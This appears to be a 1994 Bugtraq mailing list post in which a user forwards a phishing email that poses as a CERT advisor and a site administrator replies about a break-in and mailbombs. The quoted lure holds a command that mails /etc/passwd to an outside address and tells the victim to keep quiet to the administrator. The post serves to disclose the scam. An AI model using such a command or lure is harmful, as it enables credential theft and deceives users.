Bugtraq mailing list archives
Re: Another request for passwords
From: chowes () helix net (Charles Howes)
Date: Sun, 23 Oct 1994 04:17:40 -0700 (PDT)
On Sun, 23 Oct 1994, Douglas R. Floyd wrote:
I got this in the mail today (10-23).
Seems like someone is knocking on io.com now. (The forward to paris is normal as mail gets forwarded there.) BEGIN FUNKY MESSAGE --------From vanepp () sfu ca Sun Oct 23 00:00:56 1994Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP (931110.SGI/930416.SGI.AUTO) for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500 Received: from trance.helix.net by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92) id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500 From: vanepp () sfu ca Received: from (helix.net [142.231.37.2]) by trance.helix.net (8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for dfloyd () pentagon io com; Sat, 22 Oct 1994 21:33:23 -0700 Message-Id: <199410230433.VAA07859 () trance helix net> Date: Sat, 22 Oct 1994 14:22:25 To: dfloyd () pentagon io com Subject: Very Important Status: RO Dear user, It is imperative that I attain your /etc/passwd file immediately. It is for security reasons. You can mail it to me by typing: mail vanepp () sfu ca < /etc/passwd Do not tell your system administrator. I am conducting an investigation on your system. Thank you Your identity will be kept confidential. I guarantee it Thank you for your cooperation. Peter Van Epp Technical Systems Operations CERT Security Advisor vanepp () sfu ca END FUNKY MESSAGE ----- I send cert () cert org a copy, as well as the admins at io.com. I know this was posted earlier, but I think this is another address, possibly an MX record as I could not telnet or finger sfu.ca.
Hi. Yes, someone broke into an account here at Helix, and seems to have a grudge against one or more people. Vanepp in particular. Argh. This is the third mailbomb. I'm supposed to be in charge of security; how do you protect against this??!? We're using shadow passwords as of tonight, and tcp wrappers as of last month. The bugger keeps signing on via modem, and this is a problem. We can't afford callerid. -- Charles Howes -- chowes () helix net Always tell the truth, then you make it the other bloke's problem! - Sean Connery, 1971
Current thread:
- Another request for passwords Douglas R. Floyd (Oct 22)
- Re: Another request for passwords Charles Howes (Oct 23)
- Re: Another request for passwords That Whispering Wolf... (Oct 23)
- Re: Another request for passwords Charles Howes (Oct 23)
- Re: Another request for passwords christopher williams (Oct 24)
- Re: Another request for passwords Brett Watson (Oct 25)
- Re: Another request for passwords Charles Howes (Oct 23)
- Stupid crackers exploiting stupid users der Mouse (Oct 23)
- Re: Stupid crackers exploiting stupid users Peter Van Epp (Oct 23)
- Re: Stupid crackers exploiting stupid users Charles Howes (Oct 23)
- Re: Stupid crackers exploiting stupid users pluvius (Oct 25)
- Re: Stupid crackers exploiting stupid users Charles Howes (Oct 26)
- Sun Mouse Bug David J. Bianco (Oct 26)